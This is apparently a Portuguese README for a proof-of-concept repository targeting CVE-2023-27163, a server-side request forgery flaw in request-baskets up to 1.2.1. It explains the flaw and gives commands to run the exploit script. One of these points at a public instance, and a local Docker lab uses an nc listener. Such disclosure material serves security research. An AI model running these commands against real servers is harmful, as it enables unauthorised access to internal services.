
Prova de Conceito para Server Side Request Forgery (SSRF) no request-baskets (V<= v.1.2.1)
Este repositório contém uma Prova de Conceito (PoC) para CVE-2023-27163, uma vulnerabilidade de Server-Side Request Forgery (SSRF) descoberta no request-baskets até a versão 1.2.1. Essa vulnerabilidade permite que atacantes acessem recursos de rede e informações sensíveis explorando o componente /api/baskets/{name} através de uma requisição de API manipulada.
git clone https://github.com/MasterCode112/CVE-2023-27163.git
bash ./CVE-2023-27163.sh https://rbaskets.in/ <IP do atacante>
Request-baskets é uma aplicação web criada para coletar e registrar requisições em uma rota específica, chamada basket. Ao criá-la, o usuário pode especificar outro servidor para encaminhar a requisição. O problema aqui é que o usuário pode especificar serviços não intencionados, como aplicações fechadas à rede.
Por exemplo: suponha que o servidor hospede o Request-baskets (porta 55555) e um servidor web Flask na porta 8000. O Flask também está configurado para interagir apenas com localhost. Ao criar uma basket que encaminha para http://localhost:8000, o atacante pode acessar o servidor web Flask anteriormente restrito.

docker run -p 55555:55555 darklynx/request-baskets:v1.2.1
git clone https://github.com/MasterCode112/CVE-2023-27163.git
nc -lvp 8000
DOCKER_IP=$(ifconfig docker0 | grep inet | head -n 1 | awk '{ print $2 }')
./CVE-2023-27163.sh http://127.0.0.1:55555/ http://$DOCKER_IP:8000/